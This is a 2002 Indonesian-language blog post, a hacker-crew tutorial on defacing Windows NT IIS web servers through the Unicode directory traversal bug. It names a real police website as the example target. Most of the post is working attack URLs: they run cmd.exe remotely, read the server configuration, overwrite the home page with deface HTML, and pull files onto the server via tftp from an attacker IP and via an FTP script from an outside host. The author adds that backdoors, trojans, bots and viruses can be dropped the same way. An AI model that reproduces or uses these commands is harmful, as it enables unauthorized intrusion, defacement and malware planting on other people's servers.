« Linux Security Dengan Firewall IP Chains
~*~DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS~*~ »

Tutorial Unicode By Jangkr|k/Ga|b

Published January 25, 2002 Exploit , Hacking/Cracking Comment 
Tutorial Unicode By Jangkr|k/Ga|b  ( Crew Of MinangCrew, Hackermuda, Makassarhack, K-elektronik, Deface-team, Padanghacking, Indohack, Aritechdev, Neoteker, Indoprovider, Validcc, Medanhacking ...etc)
Os Target Windows Nt /9x
Ini HendakNya Dijadikan Bahan Percobaan yang Bermanfaat Yach
DediCated Toturial To : Pepole On irc.dal.net
		chanel: #MinangCrew, #K-elektronik,#Hackermuda, #Deface-team, #Makassarhack, #Indohack
			#IndoCarding, #Cracxer,#Cacing,#CrackerLink, #MedanHacking, #Aritechdev,#Neoteker ...etc
_________________________________________________________________________________________________________________________________________________________________________________________________
1. Kita Harus menentukan WebSite Target/ Sasaran Kita : www.target.loe contoh-->> www.polri.go.id 

2. Login Ini Merupakan Directory yang  Ada Di Web Site Tersebut
   Directory Ini Di Configurasi Dengan Script tertentu Supayafile dalam Web tersebut Berhubungan Jika  terjadi bug pada script nya maka kita bisa bembus web ini
   ada beberapa contoh login diantaranya :
		  a)/_vti_bin
		  b)/_vti_cnf
		  c)/cgi-bin
		  d)/scripts
		  e)/msadc 

3. Unicode --->> merupakan code yang dapat membaca script configurasi website tersebut code ini yang dapat membaca bug cgi nya
   hasil codingnya seperti bisa 1-3 x pengulangan tergantung target yang akan kita hackinng
		  a) ..%c1%1c..
		  b) ..%c0%9v..
		  c) ..%c0%af..
		  d) ..%c0%qf..
		  e) ..%c1%8s..
		  f) ..%e0%80%af..
		  g) ..%c1%9c..
		  h) ..%c1%pc..

4. OS target -->>ini Menyatakan Sertificate Web Os kita  WinNT dan Win98
		  0xB5  	ISO 8859-1
		  0xC5  	ISO 8859-1
		  0xEA  	CP437
		  0x2140  	JIS X 0208
		  0x22  	ISO 8859-1

5. Cara Kerja
Secara Garis Besar deface Ini dilakukan Dengan tiga Cara yaitu :
A.) Deface WebSite Perintah Echo

	a.)Secara umum 	: http://target/login/unicode/os/system/c+dir atau http://www.polri.go.id/login/unicode/os/system/c+dir

	http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: contohnya -->>

	Jika terdapat Bug Maka Pada title brower kita ada kata CGi Error Maka Kita telah menembus web site itu
	Maka Yang terlihat pada brower kita adalah list yang berupa isi hardisk webserver tersebut sama halnya
	command dir yang kita lakukan di Dos Prompt
	Directory of c:
		10/05/2001  19:56       <DIR>   Programs Files
		10/05/2001  19:56       <DIR>   Inetpub
		08/05/2001  10:23		   230 cmd.exe
		24/04/2001  04:33                4.620 1home.htm
		05/10/2000  12:40                  668 about.htm
		10/05/2001  19:54       <DIR>          AboutUs
		11/05/2001  10:28                  131 about_us.htm
		28/10/2000  14:49                4.911 about_us.old.htm

	b.)Setelah berhasil liat List Hardisk Kita Harus cari Path_Translade web nya dengan menggunakan command
		/c+dir+c: di ubah menjadi /c+set

	http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: menjadi 	http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+set
		/c+dir+c: di ubah menjadi /c+set

	maka Akan keluar CGI error yang isinya menyatakan Configurasi Batch Sytem WebServer tersebut
	Keluar Macam - Macam Yang Perlu dilihat cuma Path_Translade=d:wwwpolri

	c.) Langkah Selanjutnya Adalah Copy file cmd.exe dengan nama baru cmd1.exe  atau nama anda contoh Jangkrik.exe dengan mengganti 

		/c+dir+c: 	menjadi 	/c+copy+c:

	lalu ditambahkan dengan : winntsystem32cmd.exe+c:jangkrik.exe

	sehingga kita dapatkan  :
	http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:jangkrik.exe

	sekarang kamu bisa liat file cmd1.exe udah ada di direktori :

	http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:
	Tujuan Ini Sebenarnya untuk menyingkat command pada addres ie kita

	d.)Cari halaman index ke www.target.com/blah.ida
	Kadang-kadang ekstensi .ida yang tidak diketahui akan merespon lokal path.
	Kalo trik .ida tidak bekerja, coba gunakan direktori InetPub :

	http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:inetpub
	http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:inetpubwwwroot
	http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:inetpubwwwrootindex.htm

	sebenarnya langkah ini tidak perlu tapi untuk jaga -jaga kan ngak papa
	dengan langkah b.) tadi sebenarnya kita sudah tau dimana letah index.htm nya atau dengan kata lain folder webnya

	e.)kalau lo merasa dirinya hacker backup dulu halaman depan web nya, karena hacker kerjanya bukan menghancurkan tapi memperingatkan
	hanya orang - orang amatiran atau katalain orang yang berjiwa vandalis yang kerja merusak tanpa backup index.htm nya, jika tidak kita menulisnya dengan nama file baru dengan cara :

	http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+copy+c:inetpubwwwrootindex.htm+c:inetpubwwwrootindex.htm.bak

	f.) Baru Kita deface atau echo Halaman Depannya dengan command dibawah ini :

	http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+echo+You%20Were%20Hacked+>+c:inetpubwwwrootindex.htm
	untuk tidak merusak web nya kita tulis dengan nama file baru
		http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+echo+You%20Were%20Hacked+>+c:inetpubwwwrootjangkrik.htm

        /c+echo+You%20Were%20Hacked+>+c:  >>>  adalah untuk menuliskan kata-kata You Were Hacked pada 

        c:inetpubwwwrootindex.htm file yang ditulis 	atau c:inetpubwwwrootjangkrik.htm file yang ditulis 	

	Untuk Anda yang telah Paham Bahasa Html Kalau pengen Hasil Defacenya keren Gunakan command ini
	/c+echo"<html><head><title>..::Web Site Has Been Hacking BY Jangkr|k:..</title><body Bgcolor%3dBlack Text%3dRed><script language='JavaScript' type='text/javascript' src='http://www.web1000.com/theader.js'></script>
<center>This Web Site Hacking BY <marquee bgcolor%3dWhite Text%3dred><b>....:::J.A.N.G.K.|.K:...</b></marquee><br>Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda<br><img src%3D%22http://gaibsetan.f2g.net/hacking.jpg%22><script language='javascript' type='text/javascript' src='http://www.web1000.com/tfooter.js'></script>
</body></html>"+>+c:inepubwwwrootindex.htm
	/c+echo"<html><head><title>..::Web Site Has Been Hacking BY Jangkr|k:..</title><body Bgcolor%3dBlack Text%3dRed><script language='JavaScript' type='text/javascript' src='http://www.web1000.com/theader.js'></script>
<center>This Web Site Hacking BY <marquee bgcolor%3dWhite Text%3dred><b>....:::J.A.N.G.K.|.K:...</b></marquee><br>Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda<br><img src%3D%22http://gaibsetan.f2g.net/hacking.jpg%22><script language='javascript' type='text/javascript' src='http://www.web1000.com/tfooter.js'></script>
</body></html>"+>+c:inepubwwwrootjangkrik.htm
	keterangan :
		%3d adalah pernyataan tanda =
		%22 adalah Pernyataan tanda "
		%23 adalah pernyataan tanda #
	Untuk Anda Yang Paham Html Anda Bisa NGapain aja Tuh Deface Web Anda. Biar Bagus hack deface nya di input pakai Flash juga

	g.) Langkah terkahir untuk liat hasilnya Membaca file yang lain dengan menggunakan perintah 'type' :

	http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+type+c:inetpubwwwrootindex.htm
	http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+type+c:inetpubwwwrootjangkrik.htm
	Atau liat Langsung aja http://www.polri.go.id/ atau www.polri.go.id/jangkrik.htm

Jika dikau menemukan webserver ini dalam penulisannya accses denied ( penolakan penulisan ) Maka langkah kedua yaitu dengan cara tftp:

B.) Deface WebSite Dengan Cara tftp

	Deface nya dilakukan dengan meng-upload file lewat TFTP32
	Untuk Mendukung Tftp kita download dulu softwarenya http://www.download.com ketik keyword nya TFTP32
	Dikau Main Di Kompi diserver (sebab di user pasti takkan bisa).
	Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.
        mari kita mulai meng-uploadnyah perintahnya sesuai langkah berikut ini :

	a.)Kita Lakukan Langkah a.) (A.)pada deface dengan echo untuk mencari vulnernnya atau bugcginya
	sehinggha kita mendapatkan holenya atau script nya http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/
	langkah selanjutnya yaitu uploadnya lagi. Namun Sebelumnya kita Dah siapkan File htm/html halaman web defacenya ( berkreasi lah dikau disini )
	Setelah semua siap baru upload dengan command http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe up-load)+ C:InetPubwwwrootmain.html

	b.)Kita liat lagi apa yg terjadi di IE kita.

	CGI Error
	The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :

	Waa..waaa .selamat dikau telah berhasil meng-upload file dikau memakai sofwer TFTP32 tadee silahkan buka web site target tadi

	Kekurangannyah dalam meng-upload file lewat TFTP32 terkadang suatu server (web site) tidak mau menerima up-load file kita tadee
	.Jikalau itu terjadi maka gunakanlah cara pertama diatas tadee.

C.) Dengan Cara Ftp Dengan WebKita Yang Telah Kita Isi Dengan Bahan Deface Kita

        Langkah Pertama adalah kita bikin dulu domain gratisan di web server gratisan. di web itu kita drop halaman web deface kita atau backdoor,virus atau program penghancur lainnya

        selanjutnya kita lakukan Sama dengan Cara langkah a.)(A.) setelah dikau tau hole cgi bugnya atau unicodennya maka dikau lakukan langkah berikut ini:

	a.)Setelaha kita menemukan vulnernya
           http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:
           Directory of c:
		10/05/2001  19:56       <DIR>   Programs Files
		10/05/2001  19:56       <DIR>   Inetpub
		08/05/2001  10:23		   230 cmd.exe
		24/04/2001  04:33                4.620 1home.htm
		05/10/2000  12:40                  668 about.htm
		10/05/2001  19:54       <DIR>          AboutUs
		11/05/2001  10:28                  131 about_us.htm
		28/10/2000  14:49                4.911 about_us.old.htm      

        b.) Lalu kita lakukan langkah copy sesuai di langkah b.)(A.) ---->>tujuan nya memedekan command unicode nya          

        c.) Lalu Kita Liat +set nya  untuk melihat patch translade nya
           http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+set

          Kira Nya path nya di c:inetpubwwwroot

        d.)Langkah Selanjutnya Yaitu kita membuat script ftp
            - http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
            - http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
            - http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
            - http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
            - http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
            - http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
            - http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+close+>>+c:inetpubwwwrootjangkrik.ftp

              Setelah Scrip jangkrik.ftp selesai di liat lagi script nya apa benar
             http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+type+c:inetpubwwwrootjangkrik.ftp

            Setelah selesai script tuh kita jalan kan lagi script nya:
            http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+ftp+-s:c:inetpubwwwrootjangkrik.ftp

            buka ie satulagi untuk liat file nya dah smapai belum
            http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:inetpubwwwroot
            Kalau dah terkirim selamat dah

Keterangan nya :
Pada scrip jangkrik.ftp itu kita muatkan hal ini sebenarnya
open geocities.com   --->>> scriptnya --->> +echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
jangkrik --->> user name   --->>> scriptnya -->> +echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
anuamakang --->>> password --->>> scriptnya -->> +echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
lcd c:inetpubwwwroot  --->>> folder tujuan --->>> scriptnya -->>>+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
ascii --->>> bentuk file --->>> scripnya --->>> +echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
get jangkrik.htm ---->>> command tranfer file --->>> +echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
close --->> perintah dc ke web server ---->>> scripnya --->>> +echo+close+>>+c:inetpubwwwrootjangkrik.ftp

hehehe Dengan cara ini anda dapat drop apa saja keweb orang tuh baik itu web deface, backdror, ircserver, bot, bnc, psybnc, trojan and virus deh..........

untuk mengirim file yang binary kode bentuk file dari asci di ubah menjadi binary

Catatan :
	- Daftar Pustaka
		.) Tutorial R3VOLT Anggota #Medanhacking
		.) Tutorial Pak_Tani Anggota #Cracxer
		.) Tutoriaal Dis0RdeR Anggota #Medanhacking
		.) Tutorial Rio_Martin Anggota #IndoSnifing

	- Revisi Dan Tambahan Serta edit Dari Janngkr|k
	- Kalau Mau Download Software IIS Scaner Di Web Site
		. WWW.ElHACKER.NET
		. WWW.KEBAM.NET
	- Jangan Jadi Cracker Yang merusak kerja nya

Okde........... Wasalam....... See You In Next Tutorial ( Script Kidies ) ...............
.........:::::::VIVA #MINANGCREW And #HACKERMUDA:::::::::.............

1 Response to “Tutorial Unicode By Jangkr|k/Ga|b”

Feed for this Entry Trackback Address
  1. 1 konto July 14, 2007 at 10:51 pm

    bob ajarin gw nghacker

    byar alert()

    Reply

Leave a Reply

« Linux Security Dengan Firewall IP Chains
~*~DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS~*~ »

a

Blog Stats

  • 19,651 hits